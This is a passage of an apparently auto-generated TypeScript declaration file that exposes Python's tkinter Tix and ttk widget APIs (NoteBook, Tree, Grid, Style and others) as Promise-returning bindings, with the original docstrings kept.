\n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * nbframe NoteBookFrame\n\t\t * <pages> page widgets added dynamically with the add method\n\t\t */\n\t\tfunction NoteBook(master?, cnf?): Promise<INoteBook>\n\t\tfunction NoteBook$({ master, cnf }: { master?, cnf?}): Promise<INoteBook>\n\t\tinterface INoteBook extends ITixWidget {\n\t\t\tadd(name, cnf?): Promise<any>\n\t\t\tadd$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tdelete(name): Promise<any>\n\t\t\tdelete$({ name }): Promise<any>\n\t\t\tpage(name): Promise<any>\n\t\t\tpage$({ name }): Promise<any>\n\t\t\tpages(): Promise<any>\n\t\t\tpages$($: {}): Promise<any>\n\t\t\traise_page(name): Promise<any>\n\t\t\traise_page$({ name }): Promise<any>\n\t\t\traised(): Promise<any>\n\t\t\traised$($: {}): Promise<any>\n\t\t}\n\t\tinterface INoteBookFrame extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * OptionMenu - creates a menu button of options.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * menubutton Menubutton\n\t\t * menu Menu\n\t\t */\n\t\tfunction OptionMenu(master, cnf?): Promise<IOptionMenu>\n\t\tfunction OptionMenu$({ master, cnf }: { master, cnf?}): Promise<IOptionMenu>\n\t\tinterface IOptionMenu extends ITixWidget {\n\t\t\tadd_command(name, cnf?): Promise<any>\n\t\t\tadd_command$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tadd_separator(name, cnf?): Promise<any>\n\t\t\tadd_separator$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tdelete(name): Promise<any>\n\t\t\tdelete$({ name }): Promise<any>\n\t\t\tdisable(name): Promise<any>\n\t\t\tdisable$({ name }): Promise<any>\n\t\t\tenable(name): Promise<any>\n\t\t\tenable$({ name }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * PanedWindow - Multi-pane container widget\n\t\t * allows the user to interactively manipulate the sizes of several\n\t\t * panes. The panes can be arranged either vertically or horizontally.The\n\t\t * user changes the sizes of the panes by dragging the resize handle\n\t\t * between two panes.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * <panes> g/p widgets added dynamically with the add method.\n\t\t */\n\t\tfunction PanedWindow(master, cnf?): Promise<IPanedWindow>\n\t\tfunction PanedWindow$({ master, cnf }: { master, cnf?}): Promise<IPanedWindow>\n\t\tinterface IPanedWindow extends ITixWidget {\n\t\t\tadd(name, cnf?): Promise<any>\n\t\t\tadd$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tdelete(name): Promise<any>\n\t\t\tdelete$({ name }): Promise<any>\n\t\t\tforget(name): Promise<any>\n\t\t\tforget$({ name }): Promise<any>\n\t\t\tpanecget(entry, opt): Promise<any>\n\t\t\tpanecget$({ entry, opt }): Promise<any>\n\t\t\tpaneconfigure(entry, cnf?): Promise<any>\n\t\t\tpaneconfigure$({ entry, cnf }: { entry, cnf?}): Promise<any>\n\t\t\tpanes(): Promise<any>\n\t\t\tpanes$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * PopupMenu widget can be used as a replacement of the tk_popup command.\n\t\t * The advantage of the Tix PopupMenu widget is it requires less application\n\t\t * code to manipulate.\n\t\t * \n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * menubutton Menubutton\n\t\t * menu Menu\n\t\t */\n\t\tfunction PopupMenu(master, cnf?): Promise<IPopupMenu>\n\t\tfunction PopupMenu$({ master, cnf }: { master, cnf?}): Promise<IPopupMenu>\n\t\tinterface IPopupMenu extends ITixWidget {\n\t\t\tbind_widget(widget): Promise<any>\n\t\t\tbind_widget$({ widget }): Promise<any>\n\t\t\tunbind_widget(widget): Promise<any>\n\t\t\tunbind_widget$({ widget }): Promise<any>\n\t\t\tpost_widget(widget, x, y): Promise<any>\n\t\t\tpost_widget$({ widget, x, y }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Internal widget to draw resize handles on Scrolled widgets.\n\t\t */\n\t\tfunction ResizeHandle(master, cnf?): Promise<IResizeHandle>\n\t\tfunction ResizeHandle$({ master, cnf }: { master, cnf?}): Promise<IResizeHandle>\n\t\tinterface IResizeHandle extends ITixWidget {\n\t\t\tattach_widget(widget): Promise<any>\n\t\t\tattach_widget$({ widget }): Promise<any>\n\t\t\tdetach_widget(widget): Promise<any>\n\t\t\tdetach_widget$({ widget }): Promise<any>\n\t\t\thide(widget): Promise<any>\n\t\t\thide$({ widget }): Promise<any>\n\t\t\tshow(widget): Promise<any>\n\t\t\tshow$({ widget }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * ScrolledHList - HList with automatic scrollbars.\n\t\t */\n\t\tfunction ScrolledHList(master, cnf?): Promise<IScrolledHList>\n\t\tfunction ScrolledHList$({ master, cnf }: { master, cnf?}): Promise<IScrolledHList>\n\t\tinterface IScrolledHList extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * ScrolledListBox - Listbox with automatic scrollbars.\n\t\t */\n\t\tfunction ScrolledListBox(master, cnf?): Promise<IScrolledListBox>\n\t\tfunction ScrolledListBox$({ master, cnf }: { master, cnf?}): Promise<IScrolledListBox>\n\t\tinterface IScrolledListBox extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * ScrolledText - Text with automatic scrollbars.\n\t\t */\n\t\tfunction ScrolledText(master, cnf?): Promise<IScrolledText>\n\t\tfunction ScrolledText$({ master, cnf }: { master, cnf?}): Promise<IScrolledText>\n\t\tinterface IScrolledText extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * ScrolledTList - TList with automatic scrollbars.\n\t\t */\n\t\tfunction ScrolledTList(master, cnf?): Promise<IScrolledTList>\n\t\tfunction ScrolledTList$({ master, cnf }: { master, cnf?}): Promise<IScrolledTList>\n\t\tinterface IScrolledTList extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * ScrolledWindow - Window with automatic scrollbars.\n\t\t */\n\t\tfunction ScrolledWindow(master, cnf?): Promise<IScrolledWindow>\n\t\tfunction ScrolledWindow$({ master, cnf }: { master, cnf?}): Promise<IScrolledWindow>\n\t\tinterface IScrolledWindow extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * Select - Container of button subwidgets. It can be used to provide\n\t\t * radio-box or check-box style of selection options for the user.\n\t\t * \n\t\t * Subwidgets are buttons added dynamically using the add method.\n\t\t */\n\t\tfunction Select(master, cnf?): Promise<ISelect>\n\t\tfunction Select$({ master, cnf }: { master, cnf?}): Promise<ISelect>\n\t\tinterface ISelect extends ITixWidget {\n\t\t\tadd(name, cnf?): Promise<any>\n\t\t\tadd$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tinvoke(name): Promise<any>\n\t\t\tinvoke$({ name }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Toplevel window.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction Shell(master?, cnf?): Promise<IShell>\n\t\tfunction Shell$({ master, cnf }: { master?, cnf?}): Promise<IShell>\n\t\tinterface IShell extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * Toplevel window, with popup popdown and center methods.\n\t\t * It tells the window manager that it is a dialog window and should be\n\t\t * treated specially. The exact treatment depends on the treatment of\n\t\t * the window manager.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction DialogShell(master?, cnf?): Promise<IDialogShell>\n\t\tfunction DialogShell$({ master, cnf }: { master?, cnf?}): Promise<IDialogShell>\n\t\tinterface IDialogShell extends ITixWidget {\n\t\t\tpopdown(): Promise<any>\n\t\t\tpopdown$($: {}): Promise<any>\n\t\t\tpopup(): Promise<any>\n\t\t\tpopup$($: {}): Promise<any>\n\t\t\tcenter(): Promise<any>\n\t\t\tcenter$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * StdButtonBox - Standard Button Box (OK, Apply, Cancel and Help) \n\t\t */\n\t\tfunction StdButtonBox(master?, cnf?): Promise<IStdButtonBox>\n\t\tfunction StdButtonBox$({ master, cnf }: { master?, cnf?}): Promise<IStdButtonBox>\n\t\tinterface IStdButtonBox extends ITixWidget {\n\t\t\tinvoke(name): Promise<any>\n\t\t\tinvoke$({ name }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * TList - Hierarchy display widget which can be\n\t\t * used to display data in a tabular format. The list entries of a TList\n\t\t * widget are similar to the entries in the Tk listbox widget. The main\n\t\t * differences are (1) the TList widget can display the list entries in a\n\t\t * two dimensional format and (2) you can use graphical images as well as\n\t\t * multiple colors and fonts for the list entries.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction TList(master?, cnf?): Promise<ITList>\n\t\tfunction TList$({ master, cnf }: { master?, cnf?}): Promise<ITList>\n\t\tinterface ITList extends ITixWidget {\n\t\t\tactive_set(index): Promise<any>\n\t\t\tactive_set$({ index }): Promise<any>\n\t\t\tactive_clear(): Promise<any>\n\t\t\tactive_clear$($: {}): Promise<any>\n\t\t\tanchor_set(index): Promise<any>\n\t\t\tanchor_set$({ index }): Promise<any>\n\t\t\tanchor_clear(): Promise<any>\n\t\t\tanchor_clear$($: {}): Promise<any>\n\t\t\tdelete(from_, to?): Promise<any>\n\t\t\tdelete$({ from_, to }: { from_, to?}): Promise<any>\n\t\t\tdragsite_set(index): Promise<any>\n\t\t\tdragsite_set$({ index }): Promise<any>\n\t\t\tdragsite_clear(): Promise<any>\n\t\t\tdragsite_clear$($: {}): Promise<any>\n\t\t\tdropsite_set(index): Promise<any>\n\t\t\tdropsite_set$({ index }): Promise<any>\n\t\t\tdropsite_clear(): Promise<any>\n\t\t\tdropsite_clear$($: {}): Promise<any>\n\t\t\tinsert(index, cnf?): Promise<any>\n\t\t\tinsert$({ index, cnf }: { index, cnf?}): Promise<any>\n\t\t\tinfo_active(): Promise<any>\n\t\t\tinfo_active$($: {}): Promise<any>\n\t\t\tinfo_anchor(): Promise<any>\n\t\t\tinfo_anchor$($: {}): Promise<any>\n\t\t\tinfo_down(index): Promise<any>\n\t\t\tinfo_down$({ index }): Promise<any>\n\t\t\tinfo_left(index): Promise<any>\n\t\t\tinfo_left$({ index }): Promise<any>\n\t\t\tinfo_right(index): Promise<any>\n\t\t\tinfo_right$({ index }): Promise<any>\n\t\t\tinfo_selection(): Promise<any>\n\t\t\tinfo_selection$($: {}): Promise<any>\n\t\t\tinfo_size(): Promise<any>\n\t\t\tinfo_size$($: {}): Promise<any>\n\t\t\tinfo_up(index): Promise<any>\n\t\t\tinfo_up$({ index }): Promise<any>\n\t\t\tnearest(x, y): Promise<any>\n\t\t\tnearest$({ x, y }): Promise<any>\n\t\t\tsee(index): Promise<any>\n\t\t\tsee$({ index }): Promise<any>\n\t\t\tselection_clear(cnf?): Promise<any>\n\t\t\tselection_clear$({ cnf }: { cnf?}): Promise<any>\n\t\t\tselection_includes(index): Promise<any>\n\t\t\tselection_includes$({ index }): Promise<any>\n\t\t\tselection_set(first, last?): Promise<any>\n\t\t\tselection_set$({ first, last }: { first, last?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Tree - The tixTree widget can be used to display hierarchical\n\t\t * data in a tree form. The user can adjust\n\t\t * the view of the tree by opening or closing parts of the tree.\n\t\t */\n\t\tfunction Tree(master?, cnf?): Promise<ITree>\n\t\tfunction Tree$({ master, cnf }: { master?, cnf?}): Promise<ITree>\n\t\tinterface ITree extends ITixWidget {\n\n\t\t\t/**\n\t\t\t * This command calls the setmode method for all the entries in this\n\t\t\t * Tree widget: if an entry has no child entries, its mode is set to\n\t\t\t * none. Otherwise, if the entry has any hidden child entries, its mode is\n\t\t\t * set to open; otherwise its mode is set to close.\n\t\t\t */\n\t\t\tautosetmode(): Promise<any>\n\t\t\tautosetmode$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Close the entry given by entryPath if its mode is close.\n\t\t\t */\n\t\t\tclose(entrypath): Promise<any>\n\t\t\tclose$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the current mode of the entry given by entryPath.\n\t\t\t */\n\t\t\tgetmode(entrypath): Promise<any>\n\t\t\tgetmode$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Open the entry given by entryPath if its mode is open.\n\t\t\t */\n\t\t\topen(entrypath): Promise<any>\n\t\t\topen$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * This command is used to indicate whether the entry given by\n\t\t\t * entryPath has children entries and whether the children are visible. mode\n\t\t\t * must be one of open, close or none. If mode is set to open, a (+)\n\t\t\t * indicator is drawn next the entry. If mode is set to close, a (-)\n\t\t\t * indicator is drawn next the entry. If mode is set to none, no\n\t\t\t * indicators will be drawn for this entry. The default mode is none. The\n\t\t\t * open mode indicates the entry has hidden children and this entry can be\n\t\t\t * opened by the user. The close mode indicates that all the children of the\n\t\t\t * entry are now visible and the entry can be closed by the user.\n\t\t\t */\n\t\t\tsetmode(entrypath, mode?): Promise<any>\n\t\t\tsetmode$({ entrypath, mode }: { entrypath, mode?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * The CheckList widget\n\t\t * displays a list of items to be selected by the user. CheckList acts\n\t\t * similarly to the Tk checkbutton or radiobutton widgets, except it is\n\t\t * capable of handling many more items than checkbuttons or radiobuttons.\n\t\t * \n\t\t */\n\t\tfunction CheckList(master?, cnf?): Promise<ICheckList>\n\t\tfunction CheckList$({ master, cnf }: { master?, cnf?}): Promise<ICheckList>\n\t\tinterface ICheckList extends ITixWidget {\n\n\t\t\t/**\n\t\t\t * This command calls the setmode method for all the entries in this\n\t\t\t * Tree widget: if an entry has no child entries, its mode is set to\n\t\t\t * none. Otherwise, if the entry has any hidden child entries, its mode is\n\t\t\t * set to open; otherwise its mode is set to close.\n\t\t\t */\n\t\t\tautosetmode(): Promise<any>\n\t\t\tautosetmode$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Close the entry given by entryPath if its mode is close.\n\t\t\t */\n\t\t\tclose(entrypath): Promise<any>\n\t\t\tclose$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the current mode of the entry given by entryPath.\n\t\t\t */\n\t\t\tgetmode(entrypath): Promise<any>\n\t\t\tgetmode$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Open the entry given by entryPath if its mode is open.\n\t\t\t */\n\t\t\topen(entrypath): Promise<any>\n\t\t\topen$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns a list of items whose status matches status. If status is\n\t\t\t * not specified, the list of items in the \"on\" status will be returned.\n\t\t\t * Mode can be on, off, default\n\t\t\t */\n\t\t\tgetselection(mode?): Promise<any>\n\t\t\tgetselection$({ mode }: { mode?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the current status of entryPath.\n\t\t\t */\n\t\t\tgetstatus(entrypath): Promise<any>\n\t\t\tgetstatus$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Sets the status of entryPath to be status. A bitmap will be\n\t\t\t * displayed next to the entry its status is on, off or default.\n\t\t\t */\n\t\t\tsetstatus(entrypath, mode?): Promise<any>\n\t\t\tsetstatus$({ entrypath, mode }: { entrypath, mode?}): Promise<any>\n\t\t}\n\t\tinterface I_dummyButton extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyCheckbutton extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyEntry extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyFrame extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyLabel extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyListbox extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyMenu extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyMenubutton extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyScrollbar extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyText extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyScrolledListBox extends IScrolledListBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyHList extends IHList, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyScrolledHList extends IScrolledHList, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyTList extends ITList, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyComboBox extends IComboBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyDirList extends IDirList, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyDirSelectBox extends IDirSelectBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyExFileSelectBox extends IExFileSelectBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyFileSelectBox extends IFileSelectBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyFileComboBox extends IComboBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyStdButtonBox extends IStdButtonBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyNoteBookFrame extends INoteBookFrame, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyPanedWindow extends IPanedWindow, ITixSubWidget {\n\t\t}\n\n\t\t/**\n\t\t * This file implements the Canvas Object View widget. This is a base\n\t\t * class of IconView. It implements automatic placement/adjustment of the\n\t\t * scrollbars according to the canvas objects inside the canvas subwidget.\n\t\t * The scrollbars are adjusted so that the canvas is just large enough\n\t\t * to see all the objects.\n\t\t * \n\t\t */\n\t\tinterface ICObjView extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * The Tix Grid command creates a new window and makes it into a\n\t\t * tixGrid widget. Additional options, may be specified on the command\n\t\t * line or in the option database to configure aspects such as its cursor\n\t\t * and relief.\n\t\t * \n\t\t * A Grid widget displays its contents in a two dimensional grid of cells.\n\t\t * Each cell may contain one Tix display item, which may be in text,\n\t\t * graphics or other formats. See the DisplayStyle class for more information\n\t\t * about Tix display items. Individual cells, or groups of cells, can be\n\t\t * formatted with a wide range of attributes, such as its color, relief and\n\t\t * border.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction Grid(master?, cnf?): Promise<IGrid>\n\t\tfunction Grid$({ master, cnf }: { master?, cnf?}): Promise<IGrid>\n\t\tinterface IGrid extends ITixWidget {\n\n\t\t\t/**\n\t\t\t * Removes the selection anchor.\n\t\t\t */\n\t\t\tanchor_clear(): Promise<any>\n\t\t\tanchor_clear$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Get the (x,y) coordinate of the current anchor cell\n\t\t\t */\n\t\t\tanchor_get(): Promise<any>\n\t\t\tanchor_get$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Set the selection anchor to the cell at (x, y).\n\t\t\t */\n\t\t\tanchor_set(x, y): Promise<any>\n\t\t\tanchor_set$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Delete rows between from_ and to inclusive.\n\t\t\t * If to is not provided, delete only row at from_\n\t\t\t */\n\t\t\tdelete_row(from_, to?): Promise<any>\n\t\t\tdelete_row$({ from_, to }: { from_, to?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Delete columns between from_ and to inclusive.\n\t\t\t * If to is not provided, delete only column at from_\n\t\t\t */\n\t\t\tdelete_column(from_, to?): Promise<any>\n\t\t\tdelete_column$({ from_, to }: { from_, to?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * If any cell is being edited, de-highlight the cell and applies\n\t\t\t * the changes.\n\t\t\t */\n\t\t\tedit_apply(): Promise<any>\n\t\t\tedit_apply$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Highlights the cell at (x, y) for editing, if the -editnotify\n\t\t\t * command returns True for this cell.\n\t\t\t */\n\t\t\tedit_set(x, y): Promise<any>\n\t\t\tedit_set$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Get the option value for cell at (x,y)\n\t\t\t */\n\t\t\tentrycget(x, y, option): Promise<any>\n\t\t\tentrycget$({ x, y, option }): Promise<any>\n\t\t\tentryconfigure(x, y, cnf?): Promise<any>\n\t\t\tentryconfigure$({ x, y, cnf }: { x, y, cnf?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return True if display item exists at (x,y)\n\t\t\t */\n\t\t\tinfo_exists(x, y): Promise<any>\n\t\t\tinfo_exists$({ x, y }): Promise<any>\n\t\t\tinfo_bbox(x, y): Promise<any>\n\t\t\tinfo_bbox$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Moves the range of columns from position FROM through TO by\n\t\t\t * the distance indicated by OFFSET. For example, move_column(2, 4, 1)\n\t\t\t * moves the columns 2,3,4 to columns 3,4,5.\n\t\t\t */\n\t\t\tmove_column(from_, to, offset): Promise<any>\n\t\t\tmove_column$({ from_, to, offset }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Moves the range of rows from position FROM through TO by\n\t\t\t * the distance indicated by OFFSET.\n\t\t\t * For example, move_row(2, 4, 1) moves the rows 2,3,4 to rows 3,4,5.\n\t\t\t */\n\t\t\tmove_row(from_, to, offset): Promise<any>\n\t\t\tmove_row$({ from_, to, offset }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return coordinate of cell nearest pixel coordinate (x,y)\n\t\t\t */\n\t\t\tnearest(x, y): Promise<any>\n\t\t\tnearest$({ x, y }): Promise<any>\n\t\t\tset(x, y, itemtype?): Promise<any>\n\t\t\tset$({ x, y, itemtype }: { x, y, itemtype?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Queries or sets the size of the column given by\n\t\t\t * INDEX. INDEX may be any non-negative\n\t\t\t * integer that gives the position of a given column.\n\t\t\t * INDEX can also be the string \"default\"; in this case, this command\n\t\t\t * queries or sets the default size of all columns.\n\t\t\t * When no option-value pair is given, this command returns a tuple\n\t\t\t * containing the current size setting of the given column. When\n\t\t\t * option-value pairs are given, the corresponding options of the\n\t\t\t * size setting of the given column are changed. Options may be one\n\t\t\t * of the following:\n\t\t\t * pad0 pixels\n\t\t\t * Specifies the paddings to the left of a column.\n\t\t\t * pad1 pixels\n\t\t\t * Specifies the paddings to the right of a column.\n\t\t\t * size val\n\t\t\t * Specifies the width of a column. Val may be:\n\t\t\t * \"auto\" -- the width of the column is set to the\n\t\t\t * width of the widest cell in the column;\n\t\t\t * a valid Tk screen distance unit;\n\t\t\t * or a real number following by the word chars\n\t\t\t * (e.g. 3.4chars) that sets the width of the column to the\n\t\t\t * given number of characters.\n\t\t\t */\n\t\t\tsize_column(index): Promise<any>\n\t\t\tsize_column$({ index }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Queries or sets the size of the row given by\n\t\t\t * INDEX. INDEX may be any non-negative\n\t\t\t * integer that gives the position of a given row .\n\t\t\t * INDEX can also be the string \"default\"; in this case, this command\n\t\t\t * queries or sets the default size of all rows.\n\t\t\t * When no option-value pair is given, this command returns a list con-\n\t\t\t * taining the current size setting of the given row . When option-value\n\t\t\t * pairs are given, the corresponding options of the size setting of the\n\t\t\t * given row are changed. Options may be one of the following:\n\t\t\t * pad0 pixels\n\t\t\t * Specifies the paddings to the top of a row.\n\t\t\t * pad1 pixels\n\t\t\t * Specifies the paddings to the bottom of a row.\n\t\t\t * size val\n\t\t\t * Specifies the height of a row. Val may be:\n\t\t\t * \"auto\" -- the height of the row is set to the\n\t\t\t * height of the highest cell in the row;\n\t\t\t * a valid Tk screen distance unit;\n\t\t\t * or a real number following by the word chars\n\t\t\t * (e.g. 3.4chars) that sets the height of the row to the\n\t\t\t * given number of characters.\n\t\t\t */\n\t\t\tsize_row(index): Promise<any>\n\t\t\tsize_row$({ index }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Clears the cell at (x, y) by removing its display item.\n\t\t\t */\n\t\t\tunset(x, y): Promise<any>\n\t\t\tunset$({ x, y }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Scrolled Grid widgets\n\t\t */\n\t\tfunction ScrolledGrid(master?, cnf?): Promise<IScrolledGrid>\n\t\tfunction ScrolledGrid$({ master, cnf }: { master?, cnf?}): Promise<IScrolledGrid>\n\t\tinterface IScrolledGrid extends IGrid {\n\t\t}\n\t\tlet WINDOW: Promise<any>\n\t\tlet TEXT: Promise<any>\n\t\tlet STATUS: Promise<any>\n\t\tlet IMMEDIATE: Promise<any>\n\t\tlet IMAGE: Promise<any>\n\t\tlet IMAGETEXT: Promise<any>\n\t\tlet BALLOON: Promise<any>\n\t\tlet AUTO: Promise<any>\n\t\tlet ACROSSTOP: Promise<any>\n\t\tlet ASCII: Promise<any>\n\t\tlet CELL: Promise<any>\n\t\tlet COLUMN: Promise<any>\n\t\tlet DECREASING: Promise<any>\n\t\tlet INCREASING: Promise<any>\n\t\tlet INTEGER: Promise<any>\n\t\tlet MAIN: Promise<any>\n\t\tlet MAX: Promise<any>\n\t\tlet REAL: Promise<any>\n\t\tlet ROW: Promise<any>\n\t\tlet S_REGION: Promise<any>\n\t\tlet X_REGION: Promise<any>\n\t\tlet Y_REGION: Promise<any>\n\t\tlet TCL_DONT_WAIT: Promise<any>\n\t\tlet TCL_WINDOW_EVENTS: Promise<any>\n\t\tlet TCL_FILE_EVENTS: Promise<any>\n\t\tlet TCL_TIMER_EVENTS: Promise<any>\n\t\tlet TCL_IDLE_EVENTS: Promise<any>\n\t\tlet TCL_ALL_EVENTS: Promise<any>\n\t}\n\tmodule ttk {\n\t\tvar _\n\n\t\t/**\n\t\t * Returns adict with its values converted from Tcl objects to Python\n\t\t * objects.\n\t\t */\n\t\tfunction tclobjs_to_py(adict): Promise<any>\n\t\tfunction tclobjs_to_py$({ adict }): Promise<any>\n\n\t\t/**\n\t\t * If master is not None, itself is returned. If master is None,\n\t\t * the default master is returned if there is one, otherwise a new\n\t\t * master is created and returned.\n\t\t * \n\t\t * If it is not allowed to use the default root and master is None,\n\t\t * RuntimeError is raised.\n\t\t */\n\t\tfunction setup_master(master?): Promise<any>\n\t\tfunction setup_master$({ master }: { master?}): Promise<any>\n\n\t\t/**\n\t\t * Manipulate style database.\n\t\t */\n\t\tfunction Style(master?): Promise<IStyle>\n\t\tfunction Style$({ master }: { master?}): Promise<IStyle>\n\t\tinterface IStyle {\n\n\t\t\t/**\n\t\t\t * Query or sets the default value of the specified option(s) in\n\t\t\t * style.\n\t\t\t * \n\t\t\t * Each key in kw is an option and each value is either a string or\n\t\t\t * a sequence identifying the value for that option.\n\t\t\t */\n\t\t\tconfigure(style, query_opt?): Promise<any>\n\t\t\tconfigure$({ style, query_opt }: { style, query_opt?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or sets dynamic values of the specified option(s) in\n\t\t\t * style.\n\t\t\t * \n\t\t\t * Each key in kw is an option and each value should be a list or a\n\t\t\t * tuple (usually) containing statespecs grouped in tuples, or list,\n\t\t\t * or something else of your preference. A statespec is compound of\n\t\t\t * one or more states and then a value.\n\t\t\t */\n\t\t\tmap(style, query_opt?): Promise<any>\n\t\t\tmap$({ style, query_opt }: { style, query_opt?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the value specified for option in style.\n\t\t\t * \n\t\t\t * If state is specified it is expected to be a sequence of one\n\t\t\t * or more states. If the default argument is set, it is used as\n\t\t\t * a fallback value in case no specification for option is found.\n\t\t\t */\n\t\t\tlookup(style, option, state?, def?): Promise<any>\n\t\t\tlookup$({ style, option, state, def }: { style, option, state?, def?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Define the widget layout for given style. If layoutspec is\n\t\t\t * omitted, return the layout specification for given style.\n\t\t\t * \n\t\t\t * layoutspec is expected to be a list or an object different than\n\t\t\t * None that evaluates to False if you want to \"turn off\" that style.\n\t\t\t * If it is a list (or tuple, or something else), each item should be\n\t\t\t * a tuple where the first item is the layout name and the second item\n\t\t\t * should have the format described below:\n\t\t\t * \n\t\t\t * LAYOUTS\n\t\t\t * \n\t\t\t * A layout can contain the value None, if takes no options, or\n\t\t\t * a dict of options specifying how to arrange the element.\n\t\t\t * The layout mechanism uses a simplified version of the pack\n\t\t\t * geometry manager: given an initial cavity, each element is\n\t\t\t * allocated a parcel. Valid options/values are:\n\t\t\t * \n\t\t\t * side: whichside\n\t\t\t * Specifies which side of the cavity to place the\n\t\t\t * element; one of top, right, bottom or left. If\n\t\t\t * omitted, the element occupies the entire cavity.\n\t\t\t * \n\t\t\t * sticky: nswe\n\t\t\t * Specifies where the element is placed inside its\n\t\t\t * allocated parcel.\n\t\t\t * \n\t\t\t * children: [sublayout... ]\n\t\t\t * Specifies a list of elements to place inside the\n\t\t\t * element. Each element is a tuple (or other sequence)\n\t\t\t * where the first item is the layout name, and the other\n\t\t\t * is a LAYOUT.\n\t\t\t */\n\t\t\tlayout(style, layoutspec?): Promise<any>\n\t\t\tlayout$({ style, layoutspec }: { style, layoutspec?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Create a new element in the current theme of given etype.\n\t\t\t */\n\t\t\telement_create(elementname, etype): Promise<any>\n\t\t\telement_create$({ elementname, etype }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the list of elements defined in the current theme.\n\t\t\t */\n\t\t\telement_names(): Promise<any>\n\t\t\telement_names$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return the list of elementname's options.\n\t\t\t */\n\t\t\telement_options(elementname): Promise<any>\n\t\t\telement_options$({ elementname }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Creates a new theme.\n\t\t\t * \n\t\t\t * It is an error if themename already exists. If parent is\n\t\t\t * specified, the new theme will inherit styles, elements and\n\t\t\t * layouts from the specified parent theme. If settings are present,\n\t\t\t * they are expected to have the same syntax used for theme_settings.\n\t\t\t */\n\t\t\ttheme_create(themename, parent?, settings?): Promise<any>\n\t\t\ttheme_create$({ themename, parent, settings }: { themename, parent?, 